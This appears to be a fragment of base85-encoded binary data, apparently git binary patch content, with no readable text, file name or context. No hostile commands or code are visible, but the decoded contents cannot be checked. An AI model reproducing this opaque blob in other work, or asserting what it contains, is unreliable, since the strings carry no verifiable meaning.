ze7tyTc{F<tRjJhCW}eZjxKgV$r-1_sY3HVqN)61!IL&`!P`qE%?=4oN3r!SSWY^M4
ztW9&)<cWe4q>Ch2Z8qC&G`Rq1{Yqe^J~S@hj-`@y6)Wl0G!gUEAq;ZdHC~qggmm<K
zUuWrd#Qva>G_B&T*{q9)lvz$<#I$KmL)5tsfY9#o@;%|!hf0l+4|29F*L6I}5&E%j
z<C9vSX9=qlQd^I)2Ge$gjQEU-4t<WNST|MQO->xly%@}-C*oxy?;QKN>LfFI_OjKz
zx0MQHCyX@f{MbpOMPt$Ul>#OWY6uF09h(p>4o*G<$vD{r{Vw_$Mw5~~*XEW3uWb&H
z$yMWWQJu|gT5dHPoL-;=s|_E~NIDoo$sDI@jyS=P*EwrQRoI=)+CjpTn9-ggZS(=d
z7{3vuePY>8j8}S8l2AlK_TJ38h`LH&gf1QR4IU-)nm-pGUL;(LreVAwNcbsYIX+}X
zFF0RnMXvpL(LpoGx-gjw^s#h?Wu~4|K8#3~tT(`_NPrOf%O3hE7pg2L`cuT}Q^Wu}
zv4b@eF3_SbQRr)Ua>{K1=$8LGBI(?FvawQ3D_kiCb!kc^W?wP*ih%a4JySh|*}VjZ
zWA2QKK-pdO#BR|pnhwHTy0jhCI@QgSdJ!0ZkekE0t(82W+i7735&8)+#IYnXIJF@H
zgo)m=7*~eVj;@h>SB}xLC<qeu=Lc!KW23j&QBPR~<;A8ZaKp;flu+Ml)U@vihI5JM
zn=2Pn@88j+vNZb8@)k2AR~uG3=9nq3w$gTa&P(TM&F1>RT1v<JXBfO6K?;@oa5B^o
zg1dw}jMDR6^(8lP$dR6TbP=%FJLy_G>gi+>c+J9&n&7Rj>R(xFq&Za;+@aN$dZuo*
zV$8G&;Rk$Jv1$j9i)b4Vc&g`1(wbf$Aqcjk2$rz4#di)^kOg{eYvuy;ri(-z#*&Q3
zu<f0p&m46>HKkYlT$6NokK(mI*S@l=I}JZU#RfCb3Yea@l!1pcn28ABrlXmvK$Tst
z7CHI-=JtihBh*+Foe}4oKJi!APiM)n&qWS%2^C8|Bxkk?yrY7LG9^uIW=*jl-wDlh
zOzf6Yno2k{*?zD-X1M;EsWowQ!#~r4B~VtAxJT7-d$h5J=L)^=t8>zHCmEw`bz1S_
zpqat4%R5&Vo$g4N*!(Wfhg)u#y$!|@U$;CX{nac#Gd+f^HwoL}!d5@ZCMjCe#{;*v
zO?{mN;i9{xqx)w`djkCGmTkE}z=c^oyK-2(+Cai1Mu@i|O2XaR_msP=C-7sNMq-|k
z=M0E}z7_7M7FI`U+W7=g!b`~~b3(R#c^5Ai4k`KuJx_y&2S?aje{o^WPDU}8(`EUq
zkco3bSUT47!eiTYg0St!#qYaD66+-f(2(huUZ`*A$S#*5*Ok-R+cwL%59&XA;WGsh
z89~^l13_r9`z^kkNfBn2+<lh%d~aI1*(*`zQFP0-hjbGo7DdcH@F8AzvFFF)5t-2i
zD;{WvdAF&>-7T36M8tS9*BcjGoShdX>{pw~WNH(R9Z%vB>I{y@=?Zljj&%=ElA&y7
zoan;f@5$?CU-jG7&n_SY+J5$YO2$JYp`Bwt4drlHnG3%~=ZjD;`<h0jfNZ}MpJRKo
zcE*D;tBRq(rprGE`0SrSccX`bV=gxsg?p5axC(Qw8ST^v><-oC$E<}f371*lLcOLW
zlqhZ&q2?lR{PLBVa8?V-+e0TLM=$B<jF?ONW|H}WGp!F=>WBoMF<1_0X-XWd-+rN}
zS@?eeO+d20s!}pb9B?3T5HK5<0~`z-0?Y;G0rP=Ffy02qfg^w;fun#w0Y?KhKrIjj
z>VSHn0f+%{U;)qwGy%r~$F+z9TET5%)M$FLA3U%cCT29D3;|=%UX*}!jOPyp8|Xp|
zv;F#Tumg|!=xosFR$--*2~&l#pUuwxHoFGc>>gxu#$cN>i*3&8V{>+v%{e(X=jPd*
z=b_$9{s`*56pW<aOQA}=mm-aNFU30bUiui+d+F<->9&57rrY{EX}WEIi>BKKVvsFM
z3_?SeEk;q_X7G@lUHdl2piPC*SF!{P1FnYfm?NlfGt%nYj7n{+R?%e`ovPMg1`)<i
zb<o&UwE-HJs&;@%Q`Hg#%c@S$gjBT)R7S&Mu$BsuRXtNT&Li`dJ~~W+;@c()g&!Rf
z6+MMwEr>pY9@-}Q8euf-jtCldi2=O<&WYQ^K-WIo#31*6rr+wb1gtJa5H3u3QU9Xe
zFvCO+GeRWI3L<BzYEC@9-evAXKDW6aQAX}^>L8#~kp-K0bs3)AOV*(;14C?LV|BJb
zSEZ7EdSJE^KBQk|c{A6QmQ-h3wge|*1BTN!t*g!zl=_r9S9f6%`We*eNX7F!F!1Ci
zGjT{@hFM+b@Z=SsUujOSbHg|svQd`-&Zx^6@sTV_pffV7CVy5w^(8b7X3|WuEP0S!
zL<dn3&88xnLq&8j711G7M02T#=1~#Nry@EOrQ<r>oQ)IQV$OlP)jXI^RyPkJGR(O|
z4s#xnH0Kjh=^RS=Kb(B-+&C4>5nL>8E|w$d<n3ZP$|{GRVu8I&l+sSca<p~!JBp=-
ziUmW@u(cX5tkc)cFb}s2pw2zwu0BO;aN^PQiR+p}H*TO4kI{*bQDWP~SOI68x?r0q
z)f#brdXu@Jrl=b>@QTRvV<Y8SH=Brz+#1UKu~rU>>tL7FmhQNXW#U?xWX;FK+L%ps
z`n3!5DMQVvI0c$vw$lE!6ae~AfQ?sikhXM?raA*+8FjE<+sC7?FFG69?nr0bpnm#H
z<hqk`Z77}QqV6*FDj3)uM)_HS{B$EL<AqfYf5oj-X#Rb=`H$`qT_x*b%y#j}ysb#D
zOQaKo$tK+xiUgO@xbN`-#!w5blPZKkK%}&;v7dPY4I4;2!Wcska3uwV$x;qgx~?>c
z%e1k-c_IaKrh}bK!C<bGgN@~21I*JXm<w+n80S#&!*(goq)<5%L(3DzS#Sqop;ZiI
zqnJ0tbSY>HOqGJR<{nDtcn+@kew$M90l14cn`F4uI%R}9Pi#!Z2NsS-fuEl~k#4d>
zNT)G~td~+)4~)dZBJ*JLBA6RJTUfpHRJ?!Dr6?DeFXbD<Z5X=oEM*YZO05iDVP)`2
zxcg%jS7cMWMwnOF*}T%u=2ccU&1;D2_1wQwb}{xI?^ma%^LyP+`K1wg<OgPNty<s)
z%Ki}R>dBysBNZ>X3c&S2XY_wq`wsXxitGQK*)n^llXQ|L*>aVwbCG?v)r(EBB<pM$
z_d-8Acha3DtcFfDm=r`Y#SmKP)j$#m1k-yD5IU%UO=tlEgoF?;fdB!5|KB&ecRI;M
z=9j-dy0^2lQ{K!@+nMis@Af@Plmo-0$t4;Id!!4Hd00dH(J0H&**{02?oAYmupc^h
zr&JgjwF~tS3R24+rs6=2to4vxoQLh=JSvOhJ(P+;mP5z&Q;n0&P)3amHU0##JTWT^
z{5|RLBD-r-s`V6jd6e~|`tcRi6CI!ZAXxchf)xUr*sMJ7u=1j0<t53=E6jS)X5}TD
zl~<Bjc{RaGPZBG=#L6Ve3XF!zinUouhndg?)+<9<*_mJ^HNgr@g34F@wq)fU$;zLZ
z^|sB*J2oqSPGaS~1S@3xlR35W0kM)VS%KZpBvvwTkg@=WD?@7KlLRYi$=`+rWMr<8
z2z?t)MXz~0tH?R9UtVW##=U&clUjGTMnk#%IT-&utl$VTaerTh%j@iqLNyW&>C5Y8
zFR$D4n~Qd;<Oh*J0Qr%z5g#t{D@<(;VJFILZEuvHVfIIv{XL`ys_Pd|bT;+|eL8iu
zuffquXDvQghToKv-%c)Mj6601x@Lb-sgY1uYTL%vaHMltluq1ZnZ#uz7F!k#;8>=s
zxxFoxmhh4xvIpHR>uhXp3$?^t_%Lda%*$^g4{{=(NaM!Nh>`T2rV-XI@tJ1t!8zY<
z@lQ75(vGqJ&wz3j+u(*>9<2JyBnvV_TH|A(4?XAyvLMIT1g*z)T92DK(%K$QY2`T*
zncai6J*>ZRI-4a_XcUJ!ap)4CCRKt%A2`<HSV@;)B`s(T%oJ{PW7O8%-6q%E+Nf@i
zyiUYb#l2S0Jt-fv6<5S`Hp7qKO#Ei!SA<`2DVtG-YdP(t<3Ng5rj#aDfoRKe|BK80
zFIDb;VRHn?GTKbX;S_ewl6Jc=vE^c964V7XMPS<ti$RxM47$<wah#>;ha!N70+@=&
zO6#4?Xy(H~vP*7y(FrSNKICC}dly<6y)&_$^tzQkCF328JtKT{q^Sy_=`Yd{n1h4b
zEe$#i)dtRJl^mqXKvMarT`WxnN!N0%QRvFlow4#bXdBYsCJpD}+O^ZSJBC62NaVhY
zdG)c_I>Qc7SbJhRynR_WY{OCo5oi%KE^J&%6Mj(lXD-rlBublWePLr8HrTM$4=$_;
zurX>Xz4&FJi(7eKyc=uGl#J`a`9vB+hzF!D6NY7FaDZRH#ZV?qU=eo-t#h%QMwv`1
zlbgzfb+ySrM)N6Hw5iyJ8>>yjSg#l0G}oAp!(1@~g*9hdQ-+q)ccRP$>z=8UGtE*|
z7|og{Iib}7)dE;AusvWtU3wVSblbz{cnE7IG34?dW>=MK7S`%f7B<2zxn`wg-B`C%
zmAI)&e0-a%71Jt&t=6PkDe^)V%9<H=VS;l_$+!b`Q%rf$T8V`P(&IPKs#)bu!rM?g
zy6)2SH|dR+QOlX6VA-F~KuiweQ?d4+tYPgxMaSBIs)4nCnmEW_+-vsYUbm`{J|;0#
zgWU*x%c*SiYUcz~Xn~l5b-J()qH>zvqo_e1Ou@rgd{8*uI;3wlms305YXMl*F|E@p
zK9s^Nw5sW`To+=wD4)xPA%&>1LmU(~QED@6h7DR3UX8NX1@%Qb4gE&)v@zsJX8}zc
zZAd8TI47~GCMOZC+f*9SX`S<&g?mf`%Iy8kBhD#AB27Bg>44q!gh%qpCpICSdBM}t
z+||_*scUO&4z(FL-NnT#PdnDM#hTZ*MH*=<tfM8=6>aZq9eOr2acHjb<Do>Z&U7KS
z4dW+CiHEak)2t=Zw!W)LZkz2H0LP(D01WtT8&BLb1kQ(J>u6tabM79@3_T^XH(qH^
z%*1w(M4F{j)TE+jB;T)UYVYjwCi@WUdL!-K$;nD?P{vQK28u;7GL}>yxo*|!mGw&(
ztXo{SbiwL{kd;AJs{<4+7C$u_9Ld?+w5K)gq)2BwHbsFI@2qWaj8u1x99lyAWUYMo
zN!%r0DP`u7+nr9On#2<M#*fzq*pU(TH;t+=he_v0m`e*)STB@2$@a@sVU~)p7)~zO
zOe=K{yeAd5Z3Ygzs$dO;xWMLCVPWzrg$}V2XI!umb3hX^gamkb8J%Z|9Ij8tdDaZ)
zJPRiwbe^TcatBVZO^K~a5vtrQQ`3YB<Yxv!snk&tTQydw<Age1uzaEVTm=AH`CTsN
zngvI>P%DKxN2mu0^$?-X6KV}@{;2Z@4!lfP`dKuo>dfuR>~<+GEY00GPe~bx<0Y3l
z=`6r^a)B&&xd0^RYOYIlyOfmKX90hdl9D@RDoyjLg$&{l3<g0NOnfpJ?PM^j$xz#@
zXfA#S<98^2)%excv7!L33vjkhr(h}Gfa1aimcr*@z`+V*p5nqWx-kz(R;B`#4SYUO
z+1SAXDjOhkpt5x)fXX(Q2~ajR6M@M#ft^xtC^n9k2`QdE4#gJ5R{@&hp^YPtl}c-c
zw4NYa#1tHf!JISi3#qgy;C^>Vvohd-*=3y-SeaN+7&r>+19U12gQHwm<k;&0I;_vJ
zMj>!7V&~$i1FTZ5G5DGthX+xWCS0-xJq2;{;5#XvNq$e%@Mp^pZy)?-Go&#EX#jq!
z>0=Oj8bVK(Y0S1)DKl{VHj|Fu44gjdm(UzlNOM%K0y3HvV&95b@p$uTMk&KhAXQoD
zvMR`xMlMWDJdh5TcLk=3lD?h(307(UXe=QnE8ZE3;?J|n?OR6cB>zOK(!S+1l}@E?
zipi=MWB+8;RL4Awll^OU@4jjG?mKty#tm&_fjeP?(^PC>N#+hgJ+VV**NT|K+~rfU
zJTz0mqbKSOWMC5tJ5#)mTy%hjt(NDha0_}0X@=B@=v2%Fn06V+R1Pvtt+x*Am0KrH
z%8UDgX4Jep^B^R?M8@=@J-aCBuolQ<ff1}A{<Yf|&C31@SYFysJ1z)<_l?Ki#fZDC
zkHAiMXO=4v-JYo}2O2M$MYFQptJ1ugPNIQq87H1(SkL}=_iis5qqR~NhuY67yis|C
zhZcb%>A?xX@zL>xMCdbZ9Q<q;)hqZSqd6CtXF?DG`;5~j8~ZG$T|6>sF|qzAv_GXZ
zHz_5I!%7^Zl#=BCBY@ayj%w-(@HHB^MN5$V7VUzY)PbS$8s%gTK983s%7ia2M;3hu
zl!u^3@d7@^{d;*zlSft6oWv9Pc~_4kJ7xL*H%u3CfqdNdw-zNXXTi-2Lv4*MkxmaJ
zUfVmJn?n<vgxW&uBb`p%z4JIb5jerN8+a)@pIA!$l7zPz{~X=lWTwM3X;Fy|+oV-R
zppbG(h-lj>4T5?N;D+sohyg>Jxe1nr@}HS_lHkgj&59CFhQ>*}mmz}eDR!39*M$<>
z^6q-w%9YDjj%-b&zb?6Ez4-8!5f&4etu4|yE?HK7&QMu-bNR|;3s%;xS~WT;J$ZbI
z&wJ-(>2&gURC0ziiO1h-LgFI{_co-t4JlUQeGc*0W%+=^vzxhmni{V(c_+df!w{*9
zxf=*I*h1oUDPdY-Er!^Aq|q(itJ@)*>5_G_8b`#bjm<G2bQ+pu3M=C29XPk~Q{SWt
zO0ICZnqB?>CD|eMZq_bavV3vf>bn0wOeeoI9rkle%5_-Gtsn}+k0awHkkvHbsWWuj
z<mQt;<YC_aV2jkJ|3^4#0(!b%d?aO*45r)zyXms!B$k9a@CjfyF1u&NG=eQ;t=f#P
z((1H`1ucLax5O~C&uX<hYAmO#y<>4?Q>0~3z?kz{HT;TvY;qmW8B&KH=*fU0h^_$O
zAdxJ5hGD*0(j1EcGhvHK#dH}XrEcl!x|Qn!E322(WgvW{Q^s)mXo}oNi^XWzbp;^!
zBjaQ*tvg~}?ZW!S^Vd}`U%t4$wt6*0hDNtVPN;2aZfQ&s{c(~h9qxrD`fgJH@i<~M
zwWM}r?}8{vp=aAKLk6a|rc04{`!mQ<C-URcz=!3)AZ=G!#vb}egq`ak8Sp(+abS3%
zsVW|*7J@5Xtc|s@W=CX-9hW3VWZ0p{?N`M1&|xcdztLmENHxVVktrRJ<-$Ztd#`qD
zCzrdSy`{aao&YzADbB8-k@0?D-`2K-Vlj&0h{(%(Hb+RT&a$X0wlQp@cyjT=;sb>p
z6<Y>UxQzKylH>;1EL-qvf1+OY&UFE5xuww-6hd}+kY4L(ZizJRAuTjDZ7M{GI`ixo
znKzYBos~A2mA#2`?J0OZSU*8Lh2#brAMp44W}MBA)Dx0*xnS<X?n$K4hE{vAS7DDf
zc2&g&>sZ)d*8A?E?m&CP#+dBgLlq6AC-p3v{l~=XGM<yohTNaG<u;O(WF)HrV17N;
zfz6^+XK1n&<qRWBzIQ3|;Rlp>Z6^(2p2bq(%PQ>1L^`R-+2ii=!D>@tBV!0)2aVNi
zwx5zlo$>?dbJ!3Xs#U=`BoNV11E9#8bC8NX<;UhEEisJ-%%feA(RfN<26O6Zu(fBC
zfE|(aBDo!XGr&*@oR`GVHGON^XuXox)s7|{N^0MBCVA1$_SU>azZ^12q@2*)(z3d<
zc|F$3dRKF6q|?2cs0^mBu3u8O(j&c{aeRcWJV8E=F9bCptUHG2WzvY1tUdKP_==LZ
z5OtYXs$EK_r;w5Y+e3#8M`u^sU^Pl5!@h$(Gu=axliJzZoS3nlJ~UYRWnl3sSHpW%
zCt=uXDawZBXm9E(_K}^<j5jRji}}s+2rSgO**)OgyC7@wFoT8q;Ep+bls!h@(e`>_
zkU}Y^qFgp}SoC;ompv%u*n@-}h=u~^jITX>++a;Iao&<yj`!6)_=wK}`%<kjeC6*=
z+sE*e=iXus=m;@t7gjG_P`7u9+vIZDy_I!n9UEg!Glp#_D84i7(9WmhtUQotLxwQ9
z2s)sM1Mh2~c!Lx&#ie+Mue1H@F>%vlJ2w|vH;HLS8uu>VoLqyb2fKZ_?e?^$tGUHQ
zjYxq)w_HCocWvy798gMj5_+h!GqhO)dboA4;)K1mOyqCJlB-E|X=tgV9_fHGw6(2}
z8l>Ud3UWegmxmnt74M3Fm8?OkDP8T0+fT4h;ZdNCkppUDj$)UB18G=t#Wpgwv7-ZX
z;?nju`E7u+iw#)g$M#fdGmJ8u;YaWINHEY^SOZqV@oBXYI>?4_F=pM~^(E04%e-NW
z7|(BCC5*{WxPdi5%u^fc2!)%mih&rbs|6}}HewQvnQ_;T8tnGI{?NNRLk+YyIIA<h
zGnd%ON$wkQ-WxZzb|l)aoUi5_aNIpU_|!5;_!SpbRVK?KYQ>d>l|Uc^a$H(oSfZ5`
z!c=@&F^sZ9vK_9<qEcwYfN6KADyq<`fNv)COqEiNQc;CoR0<RH&~{W-S+W-$Ptb5w
zSXj1qB~QhLhzgZP*ja-Pql)q>9pa>=70_Q)T3J4vCa2=E!U_ZhmKsTvl~)z+Q+-o$
zc~MchUR;i{gH~0Q?ML5Iab;PBeC~`U#Z^V+MSJL5LK+oG`j$!xE6Xb5`j(&^sd7Ny
z62xPxN@%=~>sx|;q{4~;G1QWhlCnx2VDQRfy`&U*=_O^T+sr-RIv(J~fL2x&?@elS
zkj%0~{%CZLnVGzcFiS4&_ABrOU^?1Ck>sbMxD*+dSC(Smv#O}90=t;dB{fFMf|)rP
zI)py;kvX~MxSX<4BlQZiDyL>-hFLeNVsypmK+byeDrR28a&BYh{mgur<-EZ(H`jDe
zYPvTga|E`rbuzdPTd=^x;KU7h7)X#wJq9|!Fge16ii6QYj1jJ}gisd~1kV#<qA(#!
zX2a6~l>yv*dR(S#w$Mw3yIiDJ3eQ}j9V|SD2+yG+ty=I}!RL=*t_4hZ77BO0;EROk
zFxOb*KTmiT3v-F!OND2d@T?GgmEdcHc7*UmL{<}-yZ0V1yq&@m8)VR4`-Mn7S)_I&
ziBs@94Zkf+xX)rDH3U<YOn5JV*LnC|gda@QYnLGNxOsY*rq70H`kbqAy_UJWOr*mq
zeLAeur{93!H{uG5^lqx4-@<(pt~cWci}dN5NIz1f!!CU`?9z|ij&sGhJ$h6VOwwoF
zg+RJUH-sBT=||niTp{LaKxCMt&xT3*+>pp^5S~X6nGDkZ5kDB3_mYA6SManCTsp?&
zN0T9WG9v#resRO`WHkOS2>%hnB^ikK{1g5cGS}IRxz53PV%EQK|0Q$X2e&i|9}>I)
z=1Q6CX7c%txekUE@U8ffWp}dTekp!rt(`2iZ^Q2f{KzUhS!5?`?6+{?xt$B`F7CRE
zb62+NDphCENeJ|9>AHZ70Ud_mR0PVnG?wf3cjtr7lC-cJCv!M6nSc{2Wx1jhuY_)>
z;={XFL&zB;Pn7g$9eLEz$6x@gt*tnf$@@^lF)X+4OxB&xi(M5Lv+jAgFTR|0ql~$3
zE)$mYC{XRV+KTe^ceAaII<afnb?nGn7|*S(cnHa*q+H9^@Z8dh$7I^A$MDkH+Q(UU
zs6mCJ;u&&1L7{7(B`3?ReGXS8_XV8w6u(U5Rh;q^*Y?1dqV}`yhF)kOs;#ZvffPL+
z+=VpU71zGWY#ko(`6Z4vi{bfBB8Yl2Zr>ZY?Pj?DVBr1~y8m$Cz5=&@9k`u~+fN2=
z!AR{tBqw0iA};?8E_0QyS+|$vPWuK`N7Y{Cs6|S1R3nYRwFtjr{7Ufq57cjXz9sTK
zk^d6;fyizm-5lf;BBv5LjmYUlwh%dk$eBdWB62p7bBO$s$azH0CvpLi3yJ)S$i+l1
zA#xd!%ZXgUui{L(nw-}VxsJ&7L~bPV8zMIm`5lp4iTs|(ZA7*cxr4}^{BEw)^LzNc
z{Azw5zn?SD1LXgpbUsARho$ooaz4sc9P&eziKg0escfDCcpl^Ojt=B;TCa{7>q>zP
z0AP9m075hs0;&*7g@Eey5P-;FzhbT_Q|CeJ8*_KgQ(`#Y&znc*`JRdLl6nRbt#G?p
zTG2eESYhe)H4p>w*4HX2EMpOgfn=7E7|4i1XkBAjGof^iWgiBeYb@tt2K8!e<R!Rd
zvr#pqT`l)?+>B(S=Ts}B*qF9zC6|r86kem*xRPpR3>$w!wKA4XxC~z7SYB7PGM-J`
zf}06!(&f11@qFJExK8Bxldr^e63?G<6|VU_f9ln^`gs1dYjB;+^9!!Ubqdd)ejTn;
zdH#&e)yg#HKMi*UZ03?`WjdR+4L38`?CI5tpA}ML11uxJpyiH<@$>iuD3iH}tx!!I
zgwIs3XY(OzLK+lJLM)V(kC_k5Lq+ARLHI_T@K@q+_zD*tqHD?(Kn?1QsKKvrS=UIp
z-s^0<<2IL+?7iOA)8C|8H@I-*41`x))rV>TJGl-?ec~kbiOc%CjQ$T-ul1QL=#ILh
zDbUX{)u&7er0NCMF8Euve;VXS68`^!{};ADpb{Ag|1T*=O;dH_aAdPvW|Ob%2CqJL
zirYHH9n7>&1&L-xQ+lH#dZSs3GS%+P9oA{?zTRkdDBC)n966yJYYRC>hDKUvxPznm
z0;6z(ekQ>=p(ar`mLT<W-Bcg>%DDh6`q+7H>pV*Rd^`2DL8)I5PyNDp>K7#v{S_r@
za3orcL@##|y<8@GrQ5m+=}CS^FUn-Z>D7st*HBDAVl^G|(YsislCgH2e@@f5U2HB}
zj7LyhV@pV^1AHSy=lqvSnU3(<@jW$4XgoAHzz;YFmx}lD7~vcsoB;~tKUDYR0hLeJ
ziDWbLGzRTGfU0Z`PKr*7=0|;-GNDz``l)>jndr&UDL$4p5q>}KnbI^B${b`sdSabS
zQ1EC$Pjq@<2Gm2G#^f`9x9fE%b^vaIa0(FM=$#sviN|NMo~cOSY&(?93gTE0+(=6C
z92T4vofQT2vQQ>@E{SHip-aw41OL51!(08pwHKjq&|#??dGP&{#K^B!{=}@ekXcg^
zX$%UKK;-IOitW+Ub>lw5qF%uz7}f1l8d3mC_2hMzHl*%iM=DqFUF;}E^k`1>7?tR;
z+V!A8{RYsr#*Lus#IHerV&259>-phIcQF7PHvrZ_u*(~H-zGxT_C<X$uc|0MB^Cn!
z^VhszdiN)Lo7PQ;6$1eEe7vMxEadtf(ha+R&#m79NaBi4-U9sT?`4=2@6j?$L&|o9
zX~f8DZRh>r6bj?9?%+MvoxC^f4tuP-I3Orx8WqaAhlf))Nfk)<@~|E@Hckgr(`ZNw
zr-f5Plg%_F9!_~8MiN+IGy7VgRBqy77d%{HS6E~>!{b3jL^Y>sDZ257it2kD)kn4U
zIQR%Lq79trF)GpHw5LHg=+A(*7=Hw96@8#>=3Aict`E8OG$(ko^$hRdf(rX1@Ar2E
zDjC(%vpg((yGKxSc%JwBl&}a?Nf7c2D5~%QSzHA%GsEgbar=0m)zAB_*QmI2R20{=
zUgu#`!gQ=1a4odn=6(LIZGbcTH*O>Gu6IzDyb+LMx88-zziC_8CH+6-dEIkS)gPe>
zU4esGCW)~9l?UhcTA!dk0td6eTqZ+&%ERtUGYjzeGh*Lm{WCd=C8K;kILg;DiXTz_
zgQD7ue48BWdl~D$gJYedQbyAe>om0|IyDn&Pps3`yoJ^oYVZ*MPpvc6{%!uBS!b!+
z`nLIhzHQMV0B@hG1`iFpYm~sDOjgH*bZ_FWFEr1(D1Or)s<tjsdw|!~0yXH5m#L^K
zMM+Z)-PnZpdld{!(71P%ih+S$1A02+*Wz-l`Ww}{M(vHxpWdMR=S3%nNzzj9cI~jP
zRi|#+=|6*6*U{s92)$)(Q>Sd&Y5hj+>FY<oM<>y&->UtY1eCssLLqoq3r)6eCR9?o
zZtBMOG(_DZv!AEjf*g-wM9*gY_qc3j>V3EzsXYvO4$~jS<yhkh)%v~K>pz=CCwCX`
zw6>#^(L=4<)&9IBX||}(r`*0tW_^c>c7;wuFn0gB%(_$E5(-%Nt8(yJ;6D%PYyqba
zs9`NBg|Ox)6m%vvod;2On*V$jSjd{{t%s5Mg_L<Yn)GA1IY)AWM*4)>V?C*c_5QG7
z{Xy*uEYeU1!g>j>v)&%4Usiki1BYSac~uRQ0yHnpp9QFcH)S21&6GD)>ut3sxH!7l
zdPnW;2`o|arUaI1$oE~UwG6Hr#(a8NU!gL*>|5%e-=T7sMVALwD5vhQcB{dO(TU`-
zGCH|0w8}a~3$Bi?mh;4^TChZpkEdx!D^t@9<6L?JTeZCIOz4TrSGH=q*fz$_)%@2p
z>s&3kCc0+ZmL1l4TJZ4b;r1*WID(OK2uzXu0?oQW!xVWT$dCzmr*)BrddK|xD|yYa
zF4myOVx)D6Osb!zUkPWsLJJ<!CmZus#MB6t8wPY3<tsO9)Hbx>k<lZAM@5f{9vwU;
zdQ9M0wBK8$XCR1y{thj;Ho7*rF1jxGlju(ZAw0d4lF2d*!+e#-{!dV|N1*wlh5w#u
zpQsU**R8ecbQ#lX&?VgJqKn?@j<DWV7GZs@Ji_{05j3o|qC&1^$|tDp>lmZUk(}r)
zO#KA<<Pav<5N(LC78Yn^l(1#N&-z>qj)AAXXbhultgqlXF9Uf9uyndck8qL8BQI`*
zwM9!TdA8#5yi9~O5%y|3?A3PI6ofUcYX-tz2hqBT@MP9DEof4*lp2LvWUA<DHz9g3
z>{Awn8I{wznbICXWkuR|QQ9tC?E1xx+q&CMJA$R!J@RoNifX=(oKV2xUZb#DWwpX9
zQc~6_YPrYr6GdC^@vOxnN;zCH#wbmSfXYA&63UT^E36!&xOD~JvAVI9UdEFesU*a}
zfSDNLE)53e1%aO_EBQ&(^%_R>UdEr+tf#4Pz36G?PU{)1|I$nio$-&_0_!;q>P<Ff
zo=&asSoKBCdXYS$8|0Al666gxWj4{Xwc0C4>?iuGn)M2NF%zT9zKYCa4TcwD_%s6>
zeF)MZ`ZcQ$LBa;sJuP6$>W|;Gf<5astp}14W}poX>{W!qglRx(M9+Q*6Xu(e&pcH3
zThevhWUN5I5eu}V?%vn>XnA0LpxJAazfk+k!S}pz74^N(P$if$mCwM&F^niQYY|K8
z=bB|{z0r;>JFU-gJ)TCXFOWfAe{}MtnUKr0zLa-s6y*FBa;b#ZH}LAbG?Or}-)cR<
z*px*v*3@bJm%Mu+w6hIie{d2Zxy;VcWHJ?GoeH@XN;s_bBE;!BcpORV;_+bdJe^n!
zDdzzw+rZA#tqb*@-oB}rgE54S;#em9mr8OSg30&U?V=YNQm&KXiQ>DTE>AM`MqC=T
zn?V1-^qY0-M#`7ou?wa9wI0?kl@s4@bWD6V>9kPOt()Q9CxaN)@35u`#-g#iGrQ;w
zKgEpgNb6}PZr80_^?n)o_Y`@%-rI+%URbwNLvw|VQz7P!%@h}wOs?_7qID<I3Y#di
zkP_^7>tQok8ZA9jW_ph<ho{^1Vz(>fx!t=>x9O5K^$>B82=*wXqfraFwA?=gmGGQX
zSI>c~2KJn8z33FMk6Oj6sJK8EquD8o*2q2bAwB7(8Xrw7TY_i5<)reKZoQKT@-77#
zL&_CN_W2V8vHq?HM+K+J#rVcW)0q6G`ILf<<!E0k5$xacrR=~mSNR$&y~x-%y7jeA
zYuMMVZ%{QmQU9kxc+5*xqxFy9vcvioRTtQVS?U|TSW`0qJT^5`wZ7L$YvVY4m`euE
zG{C^whMcOl8a;s%l*DX>VB<L!7eO#^34-Nq!Q>KBE`e~{(d;tN7a70Yur4!*jUCqI
z2Hp_0NwkAgA<v#ctl*uGN6Wv`z+!@Ux!fq$wTzFzi*9Px)dnf@oWN6cV+&1zH_2QY
z&|q8`R6qnZ9TUybMR)l2YEW)M#=VTuWi7uA^e5_e!@9-5SB2f^ZZ*(uZlimQ6j)h+
zEfT962@yiDuib$tPcr>3T>ij}`*3L#4;j`Sh)|Eg1*-_%x(hdXVclu0cVmpWRLWM}
zV|bs%`@Rnzc4HUT{YF^W4<9hRx8UJJV4T*pkKlpb#GC9UZa#**o@TDc4eK$CIlXAs
zF6(isw3M(owZUUIYfm_Znzh?{67j=sG;5b^)=wE>cf7rt*3*V;){h&-o)p=vJ!Xn*
z)-O=5PO~<xm(elessZ}YM^3!QUS+=mfAlQ_vW2J`w3qA;e%NjGqT&=KkH)ma@G{=T
z%b*H>7i^=#=@Q~ZTh;ds>jMLWM}J^5E#NilFG%WAIX-@91W$^dw9xt(KG74=-;v}*
zP3XqYkmMIml3&<K(&d+o(<P)5ZPmU8U9Ep_Sl>|kSn0|Pbn8E;G5hs?ORx8PBUp>~
zL+J-<<)_6D20ql#`mNnY@TbwAhK>Hf&+rLiSf_|E=^UG+WA=KO2DtO2Kxl(<o{;6D
zONbL~RWAZvtz8EC7Spf5Wvy`)=ugDe!upj+F7U-7KE_=lz|Up4mE54=TUQ8T4t&{*
zO-yHobrraviAz{l3u=$1HxJ#zx)$CTt|Y@Wh6R4kFm7LsISMa^MDs-U8<?7|x66>P
zp*NC}lkH9swu3pm8oGoy(N^_N(AC;~!n$h^zjsT1P1MglBKV8wFBV$&CA0j12%Zd<
zPbTRKUp$v*oLru<bD>L!6Kz$WlexSstmg;i@`B8TJ|bR3DHmEVC+G312zEoTGSJN^
zm&x&5-ga_%+s=h9Ax^Ya{j<#FLt(u)D3|vWxqKjV`7k+`k45kl%H<T9%M{9`fm)uE
z%NKSobO~{yt?E}Ym+yr2^`Kn7k-6w7%YVewh1Pe;nfy2Yh6ATE#s4w86$P3~SsjC{
zwo3JS4a!!`o_INQ32~yW>Muc8YZsZ;d1i8BIv<~OcH_RlL}R)Lw~5Adu^HBbbE9+5
zL>ALX@{79Wl};8{+F8&g#IMAX((DPG#;{ts&ZO@s*&nu<J^j4_d<u4#dTBjzJ!Ku(
zLib3rfO@;sT5_{Y^GM}RB=#9&_u+CBe-QL&^&!)`1seX&U~=hptGU4Xy@|~vd^T=J
zh9@XA5lZcUx8u=WX0SY39>r-y`Rmp_X0Lx2!<V_e>bn=u?=$gv4o~ZTGyZ+P!+Ox{
z!_fwP2tEYY*>GV{dBp6o9yMvX6Ii4cSdXJ1_<(xC#KbtArr71EiD$qymZGokVxKeR
zS<`ya3~pu7t<3)gKIb;c{eYK}y%3ZpChHZ)GkOj?9J#%2^_Vm*&Vb~KaR!YNJ7mI#
